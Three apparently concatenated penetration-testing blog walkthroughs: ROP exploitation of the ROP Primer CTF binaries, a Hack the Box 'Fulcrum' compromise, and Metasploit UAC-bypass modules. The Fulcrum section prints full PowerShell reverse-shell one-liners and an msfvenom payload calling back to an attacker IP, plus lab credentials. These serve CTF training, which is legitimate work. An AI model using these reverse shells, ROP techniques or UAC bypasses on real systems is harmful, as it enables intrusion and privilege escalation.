Hack the ROP Primer: 1.0.1 (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as ROP Primer. The credit for making this vm machine goes to “Bas” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM here.

We have 3 levels available here and we are given the login credentials of all of 3 machines which are as follow:

Levels	Username	Password
Level 0	level0	warmup
Level 1	level1	shodan
Level 2	level2	tryharder

We had one binary per level, which we have to exploit each one to successfully extract flags from them.

You can download all the exploit used from here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.199.139 but you will have to find your own

netdiscover

LEVEL 0:

Now we use the given credentials to login through ssh as user level0. After logging in we find 2 files one executable file called level0 and another file called flag. Both files are owned by level1 user, but the binary file has suid bit set so we can execute it. When we run it we find that it takes a string as input and then outputs a message along with the string.

ssh level0@192.168.199.139

GDB-peda is provided by the author in the lab so we can directly analyse the binary in the target machine itself. Opening the binary in gdb we find that there is a gets function. Now gets is vulnerable to buffer overflow so we try to exploit it.

set disassembly-flavor intel

disas main

We created a 500 bytes long pattern using gdb-peda and used it as input for the binary.

pattern create 500

As soon as we passed the string we get a segmentation fault error, we use pattern offset function of gdb-peda to find the EIP offset and find that after 44 bytes we can completely overwrite EIP register.

pattern offset 0x41414641

Now we check for security and find that there is no ASLR but NX is enabled so we cannot execute shellcode on the stack.

checksec

As NX is enabled we can still use ret2libc attack to spawn a shell. But when we try to print the memory address of system we find that there is no system so we cannot execute /bin/sh to spawn a shell.

In the description we are given a hint that we can use mprotect to solve this problem.

p system

p mprotect

When we take a look at the man page for mprotect we find that it used to change protection of portions of memory by making it readable, writeable and executable. We also find it takes 3 parameters address, length of the memory that needs to be changes and protection level.

As we can make portions of memory readable, writeable and executable, we are going to use memcpy function to insert our shellcode into the block of memory.

p memcpy

Now need to select which section of the memory we are going to change, so we use gdb to see how the memory is mapped.

vmmap

We are going to take 0x080ca000 as target memory and we are going to mark 4KB of memory starting from 0x080ca000 as readable, writeable and executable. We create an exploit to this for us.

We save the output of this program in a file called input, we are going to use this as our input for the binary file.

python exp.py > input

When run the binary in gdb with using the input from our exploit, we take a look at the mapped memory and find that the memory block we selected was marked as readable, writeable and executable.

vmmap

Now we need to remove mprotect’s parameter from the stack so that we can redirect the flow of execution, mprotect function uses 3 parameters so we need to pop 3 values off the stack so we use ropgadget function in gdb and find a gadget pop3ret at 0x8048882.

ropgadget

Now we create the exploit to get an elevated shell. We use cat to keep the shell alive, we run the exploit and now we can access the flag. We take a look at the content of the file and find our first flag.

(python /tmp/exp.py; cat) | ./level0

LEVEL 1:

After completing level0, we login as level1 using the given credentials. We find a file called flag, bleh and a binary file called level1 with suid bit set. When we run the binary it says that error binding.

ssh level1@192.168.199.139

We check the listening ports on the target machine and find that port 8888 is open. We check processes with uid 1002 and find it is level1.

netstat -aepn | grep 8888

ps -aux | grep 1002

We connect it it and find it is an application that can be used to store and read files.

nc 192.168.199.139 8888

We open the binary in gdb and take a look at the assembly code for further analysis.

gdb -q level1

set disassembly-flavor intel

disas main

We setup a breakpoint on the main function. At main+115 we found that port 8888 is stored on the stack. We changed the value stored in the memory address to port 8889 so that we can run the program.

set {int}0xbffff6b0 = 8889

We create a 128 bytes long pattern using pattern_create.rb script in our system. So that we can pass the string as the name of the file.

./pattern_create -l 128

After changing the port number, we connected to it and stored a file with 128-byte size.

After mentioning the size of the file, it asks for the file name. We passed the 128 bytes long pattern as the file name.

nc 192.168.199.139 8889

When we switch to gdb we find that we get a segmentation fault.

We now use the patten_offset.rb script to find the EIP offset.

./pattern_offset.rb -q 0x63413163

We are given a hint in the description of this challenge that we can use read, write and open function to open the flag and read it.

p read

p write

p open

We are now going to need ropgadget, we need pop2ret for gadget for open function and pop3ret gadget for read function.

ropgadget

Now if we can get the address of the ‘flag’ string, then we can just read the flag and output it to the connected socket.

find flag

We create an exploit to get the flag. We run it and find the flag.

python level1.py

LEVEL 2:

After completing level1, we login as level2 using the given credentials. We find a file called flag and a binary file called level2 with suid bit set. When we run the binary, we find that it takes a string as an argument and then prints it.

ssh level2@192.168.199.139

We open the file in gdb for further analysis and find that at main+46 it calls strcpy function. As strcpy function is vulnerable to buffer overflow we exploit it.

gdb -q level2

set disassembly-flavor intel

disas main

On further analysis we find that it is similar to level0 binary file, we create a 500 bytes string and pass its argument and find the EIP offset to be 44 bytes.

pattern offset 0x41414641

This binary file has strcpy function instead of gets we cannot use “\x00”. So we use gadgets to do our work. We use ropshell.com to find all the gadgets used in this exploit.

We modified the exploit we created for level0 and inserted our gadgets. We use read function instead of memcpy function in this exploit. (Gadgets are explained in the exploit code).

As soon as we run our exploit we spawn a shell as root user. We open the flag file and get our final flag.

Hack the Box: Fulcrum Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Fulcrum” which is available online for those who want to increase their skill in penetration testing and black box testing. Fulcrum is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.

Level: Expert

Task: find user.txt and root.txt file on victim’s machine.

Since these labs are online available therefore they have static IP and IP of Fulcrum is 10.10.10.62 so let’s begin with nmap port enumeration.

We need to do a nmap version scan so that we can get a better information about the open ports.

nmap -sV -p- 10.10.10.62

From given below image, you can observe that we find ports 4, 22, 80, 88, 9999, 56423 are open.

As port 4 is running nginx server, the nginx server hosts the webpage to view it we will open it in our browser to find a page that says it is under maintenance along with a link that says try again.

We will click on the link and find that there is a page parameter that we found to be vulnerable to LFI.

Back to the nmap scan we also saw that port 80 is running nginx server, we open it in our browser and find a server error This was proved to be a dead end

Let’s try our lock on Port 88 which i also running nginx server, we open the ip address in our browser on port 88 and find a phpmyadmin page. As we don’t have any hint or clue for the credentials, we will have to try another port.

Port 9999 is running nginx server, we open the ip address on port 9999 in our browser and find a pfsense login page.

Port 56423 is running nginx, so visiting the service on Port 56423 brings us to what appears to be some sort of “API” endpoint as we receive a JSON response.

It is possible that this page is vulnerable to XXE, so we create a shell so that can upload and execute it on the target machine.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f raw > shell.php

After creating a shell, we start HTTP server on our system using python.

python -m SimpleHTTPServer 80

After creating the shell, we setup our listener using metasploit-framework.

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 10.10.14.6

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Using BurpSuite, we will capture the request, and upload the php shell. But we are unable to get a reverse shell.

We then try to exploit the page we find on port 4 using RFI and were able to successfully get a reverse shell.

We get the reverse shell, but it was not a proper shell. We will spawn a tty shell using python.

python -c “import pty; pty.spawn(‘/bin/bash’)”

After spawning a tty shell, we find a file called ‘Fulcrum_Upload_to_Corp.ps1’ we open and find it is a powershell script to encrypt the password it goes through some functions.

Now we copy the content of the script, and paste it in a site called https://tio.run/powershell We do this in hope to extract the logon credentials on the server.

Enumerating further into the system we find a file that contains an interesting internal IP address:192.168.122.228. Further what to do is that we will divert our attention to enumerate this IP address.

We scan the port of the IP address using netcat. After completion of the scan we find that port 5986 is open.

nc -zv 192.168.122.228 1-65535

We download socat into the target machine. Socat is a very useful tool which helps us to pivot our way into another network.

cd /tmp

wget http://10.10.14.6/socat

./socat tcp-listen:60217,reuseaddr,fork tcp:192.168.122.228:5986 &

We relay the connection to port 60217 on 10.10.10.62 using socat.

socat tcp-listen:5986, reuseaddr, fork tcp:10.10.10.62:60217

We will now use powershell on our windows machine to connect to the kali machine that will allow us to directly connect to the target machine. After connecting we take a look at the content of the default directory we are in and find a few files called “CheckFileServer.ps1”, “Invoke-PsExec.ps1” and “user.txt”.

Enter-PSSession -ComputerName 192.168.199.130 -Credential $5 -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)

dir

type user.txt

type CheckFileServer.ps1

Enumerating through the directories inside default IIS directory, we open web.config file and find LDAP login credentials.

Let’s create a LDAP query, and find two CNs: DC and File. We create a query about these CN’s and find some credentials.

(New-Object adsisearcher((New-Object adsi(“LDAP://dc.fulcrumlocal”, “fulcrum\ldap”,”PasswordForSearch123!”)),(objectCategory=Computer)”)).FindAll() | %{ $_.Properties.name }

We create a script to get a the user.txt and were successfully able to get the first flag. We do not have permission to get multiple PS hop.

Invoke-Command -CommandName file.fulcrm.local -Credential fulcrum.local\btables -Port 5985 -ScriptBlock { type C:\User\Btables\Desktop\user.txt }

Invoke-Command -ComputerName file.fulcrum.local -Credentail fulcrum.local\btables -Port 5985 -ScriptBlock {$client = New-Object System.Net.Sockets.TCPClient(’10.10.14.6’,53);$stream =$client.GertStream(); [byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes.0 $bytes.Lenght)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘>’;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Lenght);$stream.Flush();$client.Close() }

We setup our listener using netcat and get our reverse shell. We check for the available files and find a file called user.txt. We open it and find the first flag.

Now as we have shell on the file server. We will use the credentials we found earlier to get access on the DC server.

net use \\dc.fulcrum.local\netlogon /user:fulcrum\btables ++FileServerLogon12345++

When we will connect to DC server we find multiple ps1 scripts that contains credentials which will further help us to get the access on the server.

We create a script to check all right credentials in the file.

Now we create a script to get shell on the domain controller server.

Invoke-Command -ComputerName dc.fulcrum.local -Credential 923a -Port 5985 -ScriptBlock { $client = New-Object System.Net.Sockets.TCPClient('10.10.14.6',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() }

When we run the script, we get a pop on the windows screen that asks for password. We use the password we find earlier with the help of script.

We setup the listener and wait for the reverse shell. After getting the reverse shell in c:\Users\Administrator\Desktop we find a file called root.txt, we take a look at the content of the file and find our 2^nd flag.

nc -lvp 53

Multiple Ways to Bypass UAC using Metasploit

Hello friends!! Today we are shading light on User Account Control shortly known as UAC. We will also look how it can potentially protect you from malicious software and ignoring UAC prompt can trouble your system.

Table of content

Introduction to UAC

What is UAC?

Working of UAC

5 ways to Bypass UAC

1.       Windows Escalate UAC Protection Bypass

2.       Windows Escalate UAC Protection Bypass (In Memory Injection)

3.       Windows UAC Protection Bypass (Via FodHelper Registry Key)

4.       Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

5.       Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

Introduction to User Account Control

What is User Account Control?

A well-structured User Account Control introduced with Microsoft's Windows Vista and Windows Server 2008 operating systems to prevent unwanted system-wide changes in a way that is foreseen and requires minimal effort.

In other words it is a security feature of Windows which supports I preventing unauthorized modifications to the operating system UAC makes sure that the certain changes are made only with authorization from the administrator. If the changes are not permitted by the administrator, they are not executed, and Windows remains unchanged.

How does UAC work?

UAC works by preventing a program from carrying out any tasks which involve system changes/specific tasks. The operations which will not work unless the process attempting to carry them out is running with administrator rights. If you run a program as administrator, it will have more privileges since it would be "elevated", compared to the programs running which are not running as administrator.

Some things which cannot be done without administrator rights:

§  Registry modifications (if the registry key is under e.g. HKEY_LOCAL_MACHINE (since it affects more than one user) it will be read-only)

§  Loading a device driver

§  DLL injection

§  Modifying system time (clock)

§  Modifying User Account Control settings (via Registry, it can be enabled/disabled but you need the correct privileges to do this)

§  Modify protected directories (e.g. Windows folder, Program Files)

§  Scheduled tasks (e.g. to auto-start with administrator privileges)

UAC won't just automatically block malicious software, the purpose wasn't to determine if a program is malicious or not. It's down to the user just as much. If a program is going to be executed with administrator privileges, the user will be alerted and will need to provide confirmation. 

https://malwaretips.com/threads/why-uac-is-important-and-how-it-can-protect-you.47157/

5 Ways to Bypass UAC

Firstly exploit the target machine to obtain the meterpreter. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getsystem

getuid

If you don’t have system/admin authorities and privileges. Then you should go for bypass UAC Protection of targeted system.

Windows Escalate UAC Protection Bypass

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit windows/local/bypassuac) > set session 1

msf exploit(windows/local/bypassuac) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem

getuid

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command, you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (In Memory Injection)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(windows/local/bypassuac_injection) > set session 1

msf exploit(windows/local/bypassuac_injection) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem

getuid

Ultimately you will get NT AUTHORITY\SYSTEM Privilege, now if you will run “shell” command, you will get access of command prompt with administrator privilege.

Windows UAC Protection Bypass (Via FodHelper Registry Key)

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_fodhelper

msf exploit(windows/local/bypassuac_fodhelper) > set session 1

msf exploit(windows/local/bypassuac_fodhelper) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem

getprivs

Great!! Here we got NT AUTHORITY\SYSTEM Privilege, now if you will type “shell” command,  you will get access of command prompt with administrator privilege.

Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)

This module will bypass Windows UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows Event Viewer is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_eventvwr

msf exploit(windows/local/bypassuac_eventvwr) > set session 1

msf exploit(windows/local/bypassuac_eventvwr) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem

getuid

And again you will get NT AUTHORITY\SYSTEM Privilege.

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation. This module requires the architecture of the payload to match the OS, but the current low-privilege Meterpreter session architecture can be different. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process. This module invokes the target binary via cmd.exe on the target. Therefore if cmd.exe access is restricted, this module will not run correctly.

msf > use exploit/windows/local/bypassuac_comhijack

msf exploit(windows/local/bypassuac_comhijack) > set session 1

msf exploit(windows/local/bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 2 opened, now type the following command to determine the system authority privileges.

getsystem

getuid

Finally you will get NT AUTHORITY\SYSTEM Privilege, now if you will again run “shell” command then you will get access of command prompt with administrator privilege and this way we can help of Metasploit post exploit to bypass UAC protection.